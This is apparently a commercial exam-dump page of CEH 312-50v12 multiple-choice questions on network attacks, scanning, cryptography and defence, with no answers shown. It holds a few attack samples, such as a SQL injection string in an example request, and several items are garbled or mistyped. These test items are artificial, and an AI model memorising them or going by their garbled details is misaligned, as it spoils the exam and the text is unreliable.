New Year Sale - Special 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70dumps

312-50v12 Questions and Answers

Question # 6

An attacker identified that a user and an access point are both compatible with WPA2 and WPA3 encryption. The attacker installed a rogue access point with only WPA2 compatibility in the vicinity and forced the victim to go through the WPA2 four-way handshake to get connected. After the connection was established, the attacker used automated tools to crack WPA2-encrypted messages. What is the attack performed in the above scenario?

A.

Timing-based attack

B.

Side-channel attack

C.

Downgrade security attack

D.

Cache-based attack

Full Access
Question # 7

You are a cybersecurity specialist at CloudTech Inc., a company providing cloud-based services. You are managing a project for a client who wants to migrate their sensitive data to a public cloud service. To comply with regulatory requirements, the client insists on maintaining full control over the encryption keys even when the data is at rest on the cloud. Which of the following practices should you implement to meet this requirement?

A.

Use the cloud service provider's encryption services but store keys on-premises.

B.

Use the cloud service provider's default encryption and key management services.

C.

Rely on Secure Sockets Layer (SSL) encryption for data at rest.

D.

Encrypt data client-side before uploading to the cloud and retain control of the encryption keys.

Full Access
Question # 8

Which Nmap switch helps evade IDS or firewalls?

A.

-n/-R

B.

-0N/-0X/-0G

C.

-T

D.

-D

Full Access
Question # 9

You have been hired as an intern at a start-up company. Your first task is to help set up a basic web server for the company’s new website. The team leader has asked you to make sure the server is secure from common - threats. Based on your knowledge from studying for the CEH exam, which of the following actions should be

your priority to secure the web server?

A.

Installing a web application firewall

B.

limiting the number of concurrent connections to the server

C.

Encrypting the company’s website with SSL/TLS

D.

Regularly updating and patching the server software

Full Access
Question # 10

On performing a risk assessment, you need to determine the potential impacts when some of the critical business processes of the company interrupt its service.

What is the name of the process by which you can determine those critical businesses?

A.

Emergency Plan Response (EPR)

B.

Business Impact Analysis (BIA)

C.

Risk Mitigation

D.

Disaster Recovery Planning (DRP)

Full Access
Question # 11

Jack, a disgruntled ex-employee of Incalsol Ltd., decided to inject fileless malware into Incalsol's systems. To deliver the malware, he used the current employees' email IDs to send fraudulent emails embedded with malicious links that seem to be legitimate. When a victim employee clicks on the link, they are directed to a fraudulent website that automatically loads Flash and triggers the exploit. What is the technique used byjack to launch the fileless malware on the target systems?

A.

In-memory exploits

B.

Phishing

C.

Legitimate applications

D.

Script-based injection

Full Access
Question # 12

Harper, a software engineer, is developing an email application. To ensure the confidentiality of email messages. Harper uses a symmetric-key block cipher having a classical 12- or 16-round Feistel network with a block size of 64 bits for encryption, which includes large 8 x 32-bit S-boxes (S1, S2, S3, S4) based on bent functions, modular addition and subtraction, key-dependent rotation, and XOR operations. This cipher also uses a masking key(Km1)and a rotation key (Kr1) for performing its functions. What is the algorithm employed by Harper to secure the email messages?

A.

CAST-128

B.

AES

C.

GOST block cipher

D.

DES

Full Access
Question # 13

In your cybersecurity class, you are learning about common security risks associated with web servers. One topic that comes up is the risk posed by using default server settings. Why is using default settings ona web - server considered a security risk, and what would be the best initial step to mitigate this risk?

A.

Default settings cause server malfunctions; simplify the settings

B.

Default settings allow unlimited login attempts; setup account lockout

C.

Default settings reveal server software type; change these settings

D.

Default settings enable auto-updates; disable and manually patch

Full Access
Question # 14

Attacker Simon targeted the communication network of an organization and disabled the security controls of NetNTLMvl by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic. He then extracted all the non-network logon tokens from all the active processes to masquerade as a legitimate user to launch further attacks. What is the type of attack performed by Simon?

A.

Internal monologue attack

B.

Combinator attack

C.

Rainbow table attack

D.

Dictionary attack

Full Access
Question # 15

Joel, a professional hacker, targeted a company and identified the types of websites frequently visited by its employees. Using this information, he searched for possible loopholes in these websites and injected a malicious script that can redirect users from the web page and download malware onto a victim's machine. Joel waits for the victim to access the infected web application so as to compromise the victim's machine. Which of the following techniques is used by Joel in the above scenario?

A.

DNS rebinding attack

B.

Clickjacking attack

C.

MarioNet attack

D.

Watering hole attack

Full Access
Question # 16

James is working as an ethical hacker at Technix Solutions. The management ordered James to discover how vulnerable its network is towards footprinting attacks. James took the help of an open-source framework for performing automated reconnaissance activities. This framework helped James in gathering information using free tools and resources. What is the framework used by James to conduct footprinting and reconnaissance activities?

A.

WebSploit Framework

B.

Browser Exploitation Framework

C.

OSINT framework

D.

SpeedPhish Framework

Full Access
Question # 17

A large corporate network is being subjected to repeated sniffing attacks. To increase security, the company’s IT department decides to implement a combination of several security measures. They permanently add theMAC address of the gateway to the ARP cache, switch to using IPv6 instead of IPv4, implement the use of encrypted sessions such as SSH instead of Telnet, and use Secure File Transfer Protocol instead of FTP.

However, they are still faced with the threat of sniffing. Considering the countermeasures, what should be their next step to enhance network security?

A.

Use HTTP instead of HTTPS for protecting usernames and passwords

B.

Implement network scanning and monitoring tools

C.

Enable network identification broadcasts

D.

Retrieve MAC addresses from the OS

Full Access
Question # 18

As a cybersecurity consultant for SafePath Corp, you have been tasked with implementing a system for secure email communication. The key requirement is to ensure both confidentiality and non-repudiation. While considering various encryption methods, you are inclined towards using a combination of symmetric and asymmetric cryptography. However, you are unsure which cryptographic technique would best serve the purpose. Which of the following options would you choose to meet these requirements?

A.

Use symmetric encryption with the AES algorithm.

B.

Use the Diffie-Hellman protocol for key exchange and encryption.

C.

Apply asymmetric encryption with RSA and use the public key for encryption.

D.

Apply asymmetric encryption with RSA and use the private key for signing.

Full Access
Question # 19

Which of the following options represents a conceptual characteristic of an anomaly-based IDS over a signature-based IDS?

A.

Produces less false positives

B.

Can identify unknown attacks

C.

Requires vendor updates for a new threat

D.

Cannot deal with encrypted network traffic

Full Access
Question # 20

Insecure direct object reference is a type of vulnerability where the application does not verify if the user is authorized to access the internal object via its name or key. Suppose a malicious user Rob tries to get access to the account of a benign user Ned.

Which of the following requests best illustrates an attempt to exploit an insecure direct object reference vulnerability?

A.

“GET /restricted/goldtransfer?to=Rob&from=1 or 1=1’ HTTP/1.1Host: westbank.com”

B.

“GET /restricted/\r\n\%00account%00Ned%00access HTTP/1.1 Host: westbank.com”

C.

“GET /restricted/accounts/?name=Ned HTTP/1.1 Host westbank.com”

D.

“GET /restricted/ HTTP/1.1 Host: westbank.com

Full Access
Question # 21

An unauthorized individual enters a building following an employee through the employee entrance after the lunch rush. What type of breach has the individual just performed?

A.

Reverse Social Engineering

B.

Tailgating

C.

Piggybacking

D.

Announced

Full Access
Question # 22

When conducting a penetration test, it is crucial to use all means to get all available information about the target network. One of the ways to do that is by sniffing the network. Which of the following cannot be performed by the passive network sniffing?

A.

Identifying operating systems, services, protocols and devices

B.

Modifying and replaying captured network traffic

C.

Collecting unencrypted information about usernames and passwords

D.

Capturing a network traffic for further analysis

Full Access
Question # 23

Which type of malware spreads from one system to another or from one network to another and causes similar types of damage as viruses do to the infected system?

A.

Rootkit

B.

Trojan

C.

Worm

D.

Adware

Full Access
Question # 24

An experienced cyber attacker has created a fake Linkedin profile, successfully impersonating a high-ranking official from a well-established company, to execute a social engineering attack. The attacker then connected with other employees within the organization, receiving invitations to exclusive corporate events and gaining

access to proprietary project details shared within the network. What advanced social engineering technique has the attacker primarily used to exploit the system and what is the most likely immediate threat to the organization?

A.

Pretexting and Network Vulnerability

B.

Spear Phishing and Spam

C.

Whaling and Targeted Attacks

D.

Baiting and Involuntary Data Leakage

Full Access
Question # 25

Cross-site request forgery involves:

A.

A request sent by a malicious user from a browser to a server

B.

Modification of a request by a proxy between client and server

C.

A browser making a request to a server without the user’s knowledge

D.

A server making a request to another server without the user’s knowledge

Full Access
Question # 26

Your company, SecureTech Inc., is planning to transmit some sensitive data over an unsecured communication channel. As a cyber security expert, you decide to use symmetric key encryption to protect the data. However,

you must also ensure the secure exchange of the symmetric key. Which of the following protocols would you recommend to the team to achieve this?

A.

Implementing SSL certificates on your company's web servers.

B.

Applying the Diffie-Hellman protocol to exchange the symmetric key.

C.

Switching all data transmission to the HTTPS protocol.

D.

Utilizing SSH for secure remote logins to the servers.

Full Access
Question # 27

Shiela is an information security analyst working at HiTech Security Solutions. She is performing service version discovery using Nmap to obtain information about the running services and their versions on a target system.

Which of the following Nmap options must she use to perform service version discovery on the target host?

A.

-SN

B.

-SX

C.

-sV

D.

-SF

Full Access
Question # 28

Ron, a security professional, was pen testing web applications and SaaS platforms used by his company. While testing, he found a vulnerability that allows hackers to gain unauthorized access to API objects and perform actions such as view, update, and delete sensitive data of the company. What is the API vulnerability revealed in the above scenario?

A.

Code injections

B.

Improper use of CORS

C.

No ABAC validation

D.

Business logic flaws

Full Access
Question # 29

Based on the below log, which of the following sentences are true?

Mar 1, 2016, 7:33:28 AM 10.240.250.23 - 54373 10.249.253.15 - 22 tcp_ip

A.

Application is FTP and 10.240.250.23 is the client and 10.249.253.15 is the server.

B.

Application is SSH and 10.240.250.23 is the server and 10.249.253.15 is the client.

C.

SSH communications are encrypted; it’s impossible to know who is the client or the server.

D.

Application is SSH and 10.240.250.23 is the client and 10.249.253.15 is the server.

Full Access
Question # 30

An attacker decided to crack the passwords used by industrial control systems. In this process, he employed a loop strategy to recover these passwords. He used one character at a time to check whether the first character entered is correct; if so, he continued the loop for consecutive characters. If not, he terminated the loop. Furthermore, the attacker checked how much time the device took to finish one complete password authentication process, through which he deduced how many characters entered are correct.

What is the attack technique employed by the attacker to crack the passwords of the industrial control systems?

A.

Side-channel attack

B.

Denial-of-service attack

C.

HMI-based attack

D.

Buffer overflow attack

Full Access
Question # 31

As a part of an ethical hacking exercise, an attacker is probing a target network that is suspected to employ various honeypot systems for security. The attacker needs to detect and bypass these honeypots without alerting the target. The attacker decides to utilize a suite of techniques. Which of the following techniques would NOT assist in detecting a honeypot?

A.

Probing system services and observing the three-way handshake

B.

Using honeypot detection tools like Send-Safe Honeypot Hunter

C.

Implementing a brute force attack to verify system vulnerability

D.

Analyzing the MAC address to detect instances running on VMware

Full Access
Question # 32

As an IT Security Analyst, you’ve been asked to review the security measures of an e-commerce website that relies on a SQL database for storing sensitive customer data. Recently, an anonymous tip has alerted you to a possible threat: a seasoned hacker who specializes in SQL Injection attacks may be targeting your system. The site already employs input validation measures to prevent basic injection attacks, and it blocks any user inputs containing suspicious patterns. However, this hacker is known to use advanced SQL Injection techniques. Given this situation, which of the following strategies would the hacker most likely adopt to bypass your security measures?

A.

The hacker could deploy an 'out-of-band' SQL Injection attack, extracting data via a different communication channel, such as DNS or HTTP requests

B.

The hacker may resort to a DDoS attack instead, attempting to crash the server and thus render the e commerce site unavailable

C.

The hacker may try to use SQL commands which are less known and less likely to be blocked by your system's security

D.

The hacker might employ a blind' SQL Injection attack, taking advantage of the application's true or false responses to extract data bit by bit

Full Access
Question # 33

Gregory, a professional penetration tester working at Sys Security Ltd., is tasked with performing a security test of web applications used in the company. For this purpose, Gregory uses a tool to test for any security loopholes by hijacking a session between a client and server. This tool has a feature of intercepting proxy that can be used to inspect and modify the traffic between the browser and target application. This tool can also perform customized attacks and can be used to test the randomness of session tokens. Which of the following tools is used by Gregory in the above scenario?

A.

Nmap

B.

Burp Suite

C.

CxSAST

D.

Wireshark

Full Access
Question # 34

The network users are complaining because their system are slowing down. Further, every time they attempt to go a website, they receive a series of pop-ups with advertisements. What types of malware have the system been infected with?

A.

Virus

B.

Spyware

C.

Trojan

D.

Adware

Full Access
Question # 35

You are a penetration tester and are about to perform a scan on a specific server. The agreement that you signed with the client contains the following specific condition for the scan: “The attacker must scan every port on the server several times using a set of spoofed sources IP addresses. ” Suppose that you are using Nmap to perform this scan. What flag will you use to satisfy this requirement?

A.

The -A flag

B.

The -g flag

C.

The -f flag

D.

The -D flag

Full Access
Question # 36

Which tier in the N-tier application architecture is responsible for moving and processing data between the tiers?

A.

Presentation tier

B.

Application Layer

C.

Logic tier

D.

Data tier

Full Access
Question # 37

John, a professional hacker, targeted CyberSol Inc., an MNC. He decided to discover the loT devices connected in the target network that are using default credentials and are vulnerable to various hijacking attacks. For this purpose, he used an automated tool to scan the target network for specific types of loT devices and detect whether they are using the default, factory-set credentials. What is the tool employed by John in the above scenario?

A.

loTSeeker

B.

loT Inspector

C.

AT&T loT Platform

D.

Azure loT Central

Full Access
Question # 38

You are the chief security officer at AlphaTech, a tech company that specializes in data storage solutions. Your company is developing a new cloud storage platform where users can store their personal files. To ensure data security, the development team is proposing to use symmetric encryption for data at rest. However, they are unsure of how to securely manage and distribute the symmetric keys to users. Which of the following strategies

would you recommend to them?

A.

Use hash functions to distribute the keys.

B.

implement the Diffie-Hellman protocol for secure key exchange.

C.

Use HTTPS protocol for secure key transfer.

D.

Use digital signatures to encrypt the symmetric keys.

Full Access
Question # 39

Josh has finished scanning a network and has discovered multiple vulnerable services. He knows that several of these usually have protections against external sources but are frequently susceptible to internal users. He decides to draft an email, spoof the sender as the internal IT team, and attach a malicious file disguised as a financial spreadsheet. Before Josh sends the email, he decides to investigate other methods of getting the file onto the system. For this particular attempt, what was the last stage of the cyber kill chain that Josh performed?

A.

Exploitation

B.

Weaponization

C.

Delivery

D.

Reconnaissance

Full Access
Question # 40

Leverox Solutions hired Arnold, a security professional, for the threat intelligence process. Arnold collected information about specific threats against the organization. From this information, he retrieved contextual information about security events and incidents that helped him disclose potential risks and gain insight into attacker methodologies. He collected the information from sources such as humans, social media, and chat rooms as well as from events that resulted in cyberattacks. In this process, he also prepared a report that includes identified malicious activities, recommended courses of action, and warnings for emerging attacks. What is the type of threat intelligence collected by Arnold in the above scenario?

A.

Strategic threat intelligence

B.

Tactical threat intelligence

C.

Operational threat intelligence

D.

Technical threat intelligence

Full Access
Question # 41

A Certified Ethical Hacker (CEH) is given the task to perform an LDAP enumeration on a target system. The system is secured and accepts connections only on secure LDAP. The CEH uses Python for the enumeration process. After successfully installing LDAP and establishing a connection with the target, he attempts to fetch details like the domain name and naming context but is unable to receive the expected response. Considering the circumstances, which of the following is the most plausible reason for this situation?

A.

The Python version installed on the CEH's machine is incompatible with the Idap3 library

B.

The secure LDAP connection was not properly initialized due to a lack of 'use_ssl = True' in the server object creation

C.

The enumeration process was blocked by the target system's intrusion detection system

D.

The system failed to establish a connection due to an incorrect port number

Full Access
Question # 42

As part of a college project, you have set up a web server for hosting your team's application. Given your interest in cybersecurity, you have taken the lead in securing the server. You are aware that hackers often attempt to exploit server misconfigurations. Which of the following actions would best protect your web server from potential misconfiguration-based attacks?

A.

Performing regular server configuration audits

B.

Enabling multi-factor authentication for users

C.

Implementing a firewall to filter traffic

D.

Regularly backing up server data

Full Access
Question # 43

Which of the following is a passive wireless packet analyzer that works on Linux-based systems?

A.

Burp Suite

B.

OpenVAS

C.

tshark

D.

Kismet

Full Access
Question # 44

Rebecca, a security professional, wants to authenticate employees who use web services for safe and secure communication. In this process, she employs a component of the Web Service Architecture, which is an extension of SOAP, and it can maintain the integrity and confidentiality of SOAP messages.

Which of the following components of the Web Service Architecture is used by Rebecca for securing the communication?

A.

WSDL

B.

WS Work Processes

C.

WS-Policy

D.

WS-Security

Full Access
Question # 45

You are the chief cybersecurity officer at CloudSecure Inc., and your team is responsible for securing a cloudbased application that handles sensitive customer data. To ensure that the data is protected from breaches, you

have decided to implement encryption for both data-at-rest and data-in-transit. The development team suggests using SSL/TLS for securing data in transit. However, you want to also implement a mechanism to detect if the data was tampered with during transmission. Which of the following should you propose?

A.

Implement IPsec in addition to SSL/TLS.

B.

Qswitch to using SSH for data transmission.

C.

Use the cloud service provider's built-in encryption services.

D.

Encrypt data using the AES algorithm before transmission.

Full Access
Question # 46

Which protocol is used for setting up secure channels between two devices, typically in VPNs?

A.

PEM

B.

ppp

C.

IPSEC

D.

SET

Full Access
Question # 47

Sophia is a shopping enthusiast who spends significant time searching for trendy outfits online. Clark, an attacker, noticed her activities several times and sent a fake email containing a deceptive page link to her social media page displaying all-new and trendy outfits. In excitement, Sophia clicked on the malicious link and logged in to that page using her valid credentials. Which of the following tools is employed by Clark to create the spoofed email?

A.

PyLoris

B.

Slowloris

C.

Evilginx

D.

PLCinject

Full Access
Question # 48

A penetration tester is performing the footprinting process and is reviewing publicly available information about an organization by using the Google search engine.

Which of the following advanced operators would allow the pen tester to restrict the search to the organization’s web domain?

A.

[allinurl:]

B.

[location:]

C.

[site:]

D.

[link:]

Full Access
Question # 49

In an intricate web application architecture using an Oracle database, you, as a security analyst, have identified a potential SQL Injection attack surface. The database consists of 'x' tables, each with y columns. Each table contains z1 records. An attacker, well-versed in SQLi techniques, crafts 'u' SQL payloads, each attempting to extract maximum data from the database. The payloads include UNION SELECT' statements and 'DBMS_XSLPPOCESSOR.READ2CLOB' to read sensitive files. The attacker aims to maximize the total data extracted E=xyz'u'. Assuming 'x=4\ y=2\ and varying z' and 'u\ which situation is likely to result in the highest extracted data volume?

A.

z=400. u=4: The attacker constructs A SQLpayloads, each focusing on tables with 400 records, influencing all columns of all tables

B.

z=550, u=Z Here, the attacker formulates 2 SQL payloads and directs them towards tables containing 550 records, impacting all columns and tables

C.

z=600. u=2: The attacker devises 2 SQL payloads. each aimed at tables holding 600 records, affecting all columns across all tables

D.

Az=500. u=3: The attacker creates 3 SQL payloads and targets tables with 500 records each, exploiting all columns and tables

Full Access
Question # 50

ping-* 6 192.168.0.101

Output:

Pinging 192.168.0.101 with 32 bytes of data:

Reply from 192.168.0.101: bytes=32 time<1ms TTL=128

Reply from 192.168.0.101: bytes=32 time<1ms TTL=128

Reply from 192.168.0.101: bytes=32 time<1ms TTL=128

Reply from 192.168.0.101: bytes=32 time<1ms TTL=128

Reply from 192.168.0.101: bytes=32 time<1ms TTL=128

Reply from 192.168.0.101:

Ping statistics for 192.168.0101

Packets: Sent = 6, Received = 6, Lost = 0 (0% loss).

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

What does the option * indicate?

A.

t

B.

s

C.

a

D.

n

Full Access
Question # 51

Chandler works as a pen-tester in an IT-firm in New York. As a part of detecting viruses in the systems, he uses a detection method where the anti-virus executes the malicious codes on a virtual machine to simulate CPU and memory activities. Which type of virus detection method did Chandler use in this context?

A.

Heuristic Analysis

B.

Code Emulation

C.

Scanning

D.

Integrity checking

Full Access
Question # 52

Which of the following allows attackers to draw a map or outline the target organization's network infrastructure to know about the actual environment that they are going to hack.

A.

Enumeration

B.

Vulnerability analysis

C.

Malware analysis

D.

Scanning networks

Full Access
Question # 53

Attempting an injection attack on a web server based on responses to True/False QUESTION NO:s is called which of the following?

A.

Compound SQLi

B.

Blind SQLi

C.

Classic SQLi

D.

DMS-specific SQLi

Full Access
Question # 54

Roma is a member of a security team. She was tasked with protecting the internal network of an organization from imminent threats. To accomplish this task, Roma fed threat intelligence into the security devices in a digital format to block and identify inbound and outbound malicious traffic entering the organization's network.

Which type of threat intelligence is used by Roma to secure the internal network?

A.

Technical threat intelligence

B.

Operational threat intelligence

C.

Tactical threat intelligence

D.

Strategic threat intelligence

Full Access
Question # 55

An ethical hacker is hired to conduct a comprehensive network scan of a large organization that strongly suspects potential intrusions into their internal systems. The hacker decides to employ a combination of scanning tools to obtain a detailed understanding of the network. Which sequence of actions would provide the most comprehensive information about the network's status?

A.

Initiate with Nmap for a ping sweep, then use Metasploit to scan for open ports and services, and finally use Hping3 to perform remote OS fingerprinting

B.

Use Hping3 for an ICMP ping scan on the entire subnet, then use Nmap for a SYN scan on identified active hosts, and finally use Metasploit to exploit identified vulnerabilities

C.

Start with Hping3 for a UDP scan on random ports, then use Nmap for a version detection scan, and finally use Metasploit to exploit detected vulnerabilities

D.

Begin with NetScanTools Pro for a general network scan, then use Nmap for OS detection and version detection, and finally perform an SYN flooding with Hping3

Full Access
Question # 56

Stephen, an attacker, targeted the industrial control systems of an organization. He generated a fraudulent email with a malicious attachment and sent it to employees of the target organization. An employee who manages the sales software of the operational plant opened the fraudulent email and clicked on the malicious attachment. This resulted in the malicious attachment being downloaded and malware being injected into the sales software maintained in the victim's system. Further, the malware propagated itself to other networked systems, finally damaging the industrial automation components. What is the attack technique used by Stephen to damage the industrial systems?

A.

Spear-phishing attack

B.

SMishing attack

C.

Reconnaissance attack

D.

HMI-based attack

Full Access
Question # 57

Which of the following Google advanced search operators helps an attacker in gathering information about websites that are similar to a specified target URL?

A.

[inurl:]

B.

[related:]

C.

[info:]

D.

[site:]

Full Access
Question # 58

Clark, a professional hacker, was hired by an organization lo gather sensitive Information about its competitors surreptitiously. Clark gathers the server IP address of the target organization using Whole footprinting. Further, he entered the server IP address as an input to an online tool to retrieve information such as the network range of the target organization and to identify the network topology and operating system used in the network. What is the online tool employed by Clark in the above scenario?

A.

AOL

B.

ARIN

C.

DuckDuckGo

D.

Baidu

Full Access
Question # 59

How does a denial-of-service attack work?

A.

A hacker prevents a legitimate user (or group of users) from accessing a service

B.

A hacker uses every character, word, or letter he or she can think of to defeat authentication

C.

A hacker tries to decipher a password by using a system, which subsequently crashes the network

D.

A hacker attempts to imitate a legitimate user by confusing a computer or even another person

Full Access
Question # 60

Scenario: Joe turns on his home computer to access personal online banking. When he enters the URL www.bank.com. the website is displayed, but it prompts him to re-enter his credentials as if he has never visited the site before. When he examines the website URL closer, he finds that the site is not secure and the web address appears different. What type of attack he is experiencing?.

A.

Dos attack

B.

DHCP spoofing

C.

ARP cache poisoning

D.

DNS hijacking

Full Access
Question # 61

in an attempt to increase the security of your network, you Implement a solution that will help keep your wireless network undiscoverable and accessible only to those that know It. How do you accomplish this?

A.

Delete the wireless network

B.

Remove all passwords

C.

Lock all users

D.

Disable SSID broadcasting

Full Access
Question # 62

Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night. Upon reviewing, he finds that user data have been exfilltrated by an attacker. AV tools are unable to find any malicious software, and the IDS/IPS has not reported on any non-whitelisted programs, what type of malware did the attacker use to bypass the company's application whitelisting?

A.

Phishing malware

B.

Zero-day malware

C.

File-less malware

D.

Logic bomb malware

Full Access
Question # 63

In the context of Windows Security, what is a 'null' user?

A.

A user that has no skills

B.

An account that has been suspended by the admin

C.

A pseudo account that has no username and password

D.

A pseudo account that was created for security administration purpose

Full Access
Question # 64

What is the common name for a vulnerability disclosure program opened by companies In platforms such as HackerOne?

A.

Vulnerability hunting program

B.

Bug bounty program

C.

White-hat hacking program

D.

Ethical hacking program

Full Access
Question # 65

OpenSSL on Linux servers includes a command line tool for testing TLS. What is the name of the tool and the correct syntax to connect to a web server?

A.

openssl s_client -site www.website.com:443

B.

openssl_client -site www.website.com:443

C.

openssl s_client -connect www.website.com:443

D.

openssl_client -connect www.website.com:443

Full Access
Question # 66

joe works as an it administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider, in the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario?

A.

Cloud booker

B.

Cloud consumer

C.

Cloud carrier

D.

Cloud auditor

Full Access
Question # 67

what is the port to block first in case you are suspicious that an loT device has been compromised?

A.

22

B.

443

C.

48101

D.

80

Full Access
Question # 68

Jason, an attacker, targeted an organization to perform an attack on its Internet-facing web server with the intention of gaining access to backend servers, which are protected by a firewall. In this process, he used a URL https://xyz.com/feed.php?url:externaIsile.com/feed/to to obtain a remote feed and altered the URL input to the local host to view all the local resources on the target server. What is the type of attack Jason performed In the above scenario?

A.

website defacement

B.

Server-side request forgery (SSRF) attack

C.

Web server misconfiguration

D.

web cache poisoning attack

Full Access
Question # 69

How is the public key distributed in an orderly, controlled fashion so that the users can be sure of the sender’s identity?

A.

Hash value

B.

Private key

C.

Digital signature

D.

Digital certificate

Full Access
Question # 70

Boney, a professional hacker, targets an organization for financial benefits. He performs an attack by sending his session ID using an MITM attack technique. Boney first obtains a valid session ID by logging into a service and later feeds the same session 10 to the target employee. The session ID links the target employee to Boneys account page without disclosing any information to the victim. When the target employee clicks on the link, all the sensitive payment details entered in a form are linked to Boneys account. What is the attack performed by Boney in the above scenario?

A.

Session donation attack

B.

Session fixation attack

C.

Forbidden attack

D.

CRIME attack

Full Access
Question # 71

Richard, an attacker, aimed to hack loT devices connected to a target network. In this process. Richard recorded the frequency required to share information between connected devices. After obtaining the frequency, he captured the original data when commands were initiated by the connected devices. Once the original data were collected, he used free tools such as URH to segregate the command sequence. Subsequently, he started injecting the segregated command sequence on the same frequency into the loT network, which repeats the captured signals of the devices. What Is the type of attack performed by Richard In the above scenario?

A.

Side-channel attack

B.

Replay attack

C.

CrypTanalysis attack

D.

Reconnaissance attack

Full Access
Question # 72

Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network.

Which of the following host discovery techniques must he use to perform the given task?

A.

UDP scan

B.

TCP Maimon scan

C.

arp ping scan

D.

ACK flag probe scan

Full Access
Question # 73

Fred is the network administrator for his company. Fred is testing an internal switch.

From an external IP address, Fred wants to try and trick this switch into thinking it already has established a session with his computer. How can Fred accomplish this?

A.

Fred can accomplish this by sending an IP packet with the RST/SIN bit and the source address of his computer.

B.

He can send an IP packet with the SYN bit and the source address of his computer.

C.

Fred can send an IP packet with the ACK bit set to zero and the source address of the switch.

D.

Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.

Full Access
Question # 74

which type of virus can change its own code and then cipher itself multiple times as it replicates?

A.

Stealth virus

B.

Tunneling virus

C.

Cavity virus

D.

Encryption virus

Full Access
Question # 75

During an Xmas scan what indicates a port is closed?

A.

No return response

B.

RST

C.

ACK

D.

SYN

Full Access
Question # 76

What piece of hardware on a computer's motherboard generates encryption keys and only releases a part of the key so that decrypting a disk on a new piece of hardware is not possible?

A.

CPU

B.

GPU

C.

UEFI

D.

TPM

Full Access
Question # 77

George is a security professional working for iTech Solutions. He was tasked with securely transferring sensitive data of the organization between industrial systems. In this process, he used a short-range communication protocol based on the IEEE 203.15.4 standard. This protocol is used in devices that transfer data infrequently at a low rate in a restricted area, within a range of 10-100 m. What is the short-range wireless communication technology George employed in the above scenario?

A.

MQTT

B.

LPWAN

C.

Zigbee

D.

NB-IoT

Full Access
Question # 78

Which of the following are well known password-cracking programs?

A.

L0phtcrack

B.

NetCat

C.

Jack the Ripper

D.

Netbus

E.

John the Ripper

Full Access
Question # 79

Gavin owns a white-hat firm and is performing a website security audit for one of his clients. He begins by running a scan which looks for common misconfigurations and outdated software versions. Which of the following tools is he most likely using?

A.

Nikto

B.

Nmap

C.

Metasploit

D.

Armitage

Full Access
Question # 80

Sam is working as a system administrator In an organization. He captured the principal characteristics of a vulnerability and produced a numerical score to reflect Its severity using CVSS v3.0 to property assess and prioritize the organization's vulnerability management processes. The base score that Sam obtained after performing cvss rating was 4.0. What is the CVSS severity level of the vulnerability discovered by Sam in the above scenario?

A.

Medium

B.

Low

C.

Critical

D.

High

Full Access
Question # 81

Which of the following commands checks for valid users on an SMTP server?

A.

RCPT

B.

CHK

C.

VRFY

D.

EXPN

Full Access
Question # 82

There have been concerns in your network that the wireless network component is not sufficiently secure. You perform a vulnerability scan of the wireless network and find that it is using an old encryption protocol that was designed to mimic wired encryption, what encryption protocol is being used?

A.

WEP

B.

RADIUS

C.

WPA

D.

WPA3

Full Access
Question # 83

What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application?

A.

AndroidManifest.xml

B.

APK.info

C.

resources.asrc

D.

classes.dex

Full Access
Question # 84

John is an incident handler at a financial institution. His steps in a recent incident are not up to the standards of the company. John frequently forgets some steps and procedures while handling responses as they are very stressful to perform. Which of the following actions should John take to overcome this problem with the least administrative effort?

A.

Create an incident checklist.

B.

Select someone else to check the procedures.

C.

Increase his technical skills.

D.

Read the incident manual every time it occurs.

Full Access
Question # 85

Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical Information to Johnson's machine. What is the social engineering technique Steve employed in the above scenario?

A.

Quid pro quo

B.

Diversion theft

C.

Elicitation

D.

Phishing

Full Access
Question # 86

An attacker runs netcat tool to transfer a secret file between two hosts.

He is worried about information being sniffed on the network.

How would the attacker use netcat to encrypt the information before transmitting onto the wire?

A.

Machine A: netcat -l -p -s password 1234 < testfileMachine B: netcat 1234

B.

Machine A: netcat -l -e magickey -p 1234 < testfileMachine B: netcat 1234

C.

Machine A: netcat -l -p 1234 < testfile -pw passwordMachine B: netcat 1234 -pw password

D.

Use cryptcat instead of netcat

Full Access
Question # 87

How can you determine if an LM hash you extracted contains a password that is less than 8 characters long?

A.

There is no way to tell because a hash cannot be reversed

B.

The right most portion of the hash is always the same

C.

The hash always starts with AB923D

D.

The left most portion of the hash is always the same

E.

A portion of the hash will be all 0's

Full Access
Question # 88

Susan, a software developer, wants her web API to update other applications with the latest information. For this purpose, she uses a user-defined HTTP tailback or push APIs that are raised based on trigger events: when invoked, this feature supplies data to other applications so that users can instantly receive real-time Information.

Which of the following techniques is employed by Susan?

A.

web shells

B.

Webhooks

C.

REST API

D.

SOAP API

Full Access
Question # 89

Bob, your senior colleague, has sent you a mail regarding a deal with one of the clients. You are requested to accept the offer and you oblige. After 2 days. Bob denies that he had ever sent a mail. What do you want to ""know"" to prove yourself that it was Bob who had send a mail?

A.

Authentication

B.

Confidentiality

C.

Integrity

D.

Non-Repudiation

Full Access
Question # 90

Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated attacks and bring down its reputation in the market. To launch the attacks process, he performed DNS footprinting to gather information about ONS servers and to identify the hosts connected in the target network. He used an automated tool that can retrieve information about DNS zone data including DNS domain names, computer names. IP addresses. DNS records, and network Who is records. He further exploited this information to launch other sophisticated attacks. What is the tool employed by Gerard in the above scenario?

A.

Knative

B.

zANTI

C.

Towelroot

D.

Bluto

Full Access
Question # 91

Password cracking programs reverse the hashing process to recover passwords. (True/False.)

A.

True

B.

False

Full Access
Question # 92

You need a tool that can do network intrusion prevention and intrusion detection, function as a network sniffer, and record network activity, what tool would you most likely select?

A.

Nmap

